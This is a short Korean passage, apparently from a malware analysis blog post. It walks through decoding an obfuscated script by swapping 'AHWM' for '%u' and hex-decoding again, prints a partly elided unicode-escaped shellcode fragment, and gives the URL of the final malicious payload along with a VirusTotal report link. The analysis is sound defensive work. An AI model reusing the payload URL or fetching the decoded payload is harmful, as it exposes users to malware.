AHWM라는걸 본다면 쉽게풀수 있습니다.

AHWM%u로 바꿔 줍니다.

%uADB7%u3Dbd3%u8d92%u[중간코드 생략]8c8f%ude93%ucece%ubdbd
이런식으로 접근하게 됩니다.

이와 같이

 


다시 Hex View 로 가서 디코딩을 한번 더 해주면 최종 파일에 접근 할 수 있습니다.

 



이와 같이 멀질라를 이용해서 파악만 하면 쉽게 최종 파일에 접근 할 수 있습니다.

최종 파일 : http://www.jx2xbxxx.com/dxf/021.css

바이러스 토탈 :

http://www.virustotal.com/file-scan/report.html?id=6a179b8d9d3837fa1ecc4b2331959631519e8216f85f1f7ee2e5b844d8d1980a-1311758547
